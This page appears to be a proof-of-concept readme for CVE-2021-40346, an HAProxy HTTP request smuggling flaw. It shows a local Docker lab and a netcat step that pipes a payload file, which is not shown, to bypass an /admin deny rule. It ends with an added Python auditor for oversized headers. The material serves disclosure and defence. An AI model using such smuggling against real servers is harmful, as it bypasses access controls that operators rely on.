CVE-2021-40346 PoC: Haproxy HAProxy input validation error vulnerability

Source
Associated Vulnerability
Title: Haproxy HAProxy input validation error vulnerability (CVE-2021-40346)
Description: An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
Description
CVE-2021-40346 PoC (HAProxy HTTP Smuggling)
Readme
# CVE-2021-40346
CVE-2021-40346 PoC (HAProxy HTTP Smuggling)

For educational purposes only

## Setup

```
$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4
```

## Test
Confirm `/admin` is denied.

```
$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
```

`/admin` does not appear in the log, which means the request never reached the backend server because HAProxy denied it.

```
$ docker logs poc
server start at port 8000
/
```

Next, confirm that the deny rule can be bypassed with `payload.txt`.

```
$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked

6
hello

0
```

You will find `/admin` in the log.

```
$ docker logs poc
server start at port 8000
/
/
/admin
```
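
A defensive check for the `htx_add_header` overflow described above, as an added example that is not part of the PoC repository: it audits a raw HTTP/1.1 request head for headers larger than an HTX header block can encode. The 255-byte name and 1048575-byte value limits are assumptions taken from the upstream fix, not from this page; `audit_request_head` and the sample requests are hypothetical and constructed.

```python
# Added example (not from the PoC repository): audit a raw HTTP/1.1 request
# head against the header sizes an HTX header block can encode.
MAX_NAME_LEN = 255        # assumption (upstream fix): name length is an 8-bit field
MAX_VALUE_LEN = 1048575   # assumption (upstream fix): value length is a 20-bit field


def audit_request_head(raw: bytes) -> list:
    """Return a list of findings for one request; an empty list means clean."""
    head = raw.split(b"\r\n\r\n", 1)[0]       # ignore any body bytes
    findings = []
    for line in head.split(b"\r\n")[1:]:      # element 0 is the request line
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("header line without a colon: %r" % line[:40])
            continue
        value = value.strip(b" \t")
        if len(name) > MAX_NAME_LEN:
            findings.append("header name is %d bytes (limit %d), starts with %r"
                            % (len(name), MAX_NAME_LEN, name[:24]))
        if len(value) > MAX_VALUE_LEN:
            findings.append("value of header %r is %d bytes (limit %d)"
                            % (name[:24], len(value), MAX_VALUE_LEN))
    return findings


# Constructed sample inputs (these are not the repository's payload.txt).
SAMPLE_OK = b"GET / HTTP/1.1\r\nHost: localhost:8000\r\n\r\n"
SAMPLE_LONG_NAME = (b"GET / HTTP/1.1\r\nHost: localhost:8000\r\n"
                    b"X-Constructed-" + b"a" * 300 + b": 1\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("ok", SAMPLE_OK), ("long-name", SAMPLE_LONG_NAME)):
        print(label, audit_request_head(req) or "clean")
```

A request with any finding should be rejected or logged before it reaches an HAProxy version in the affected range.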
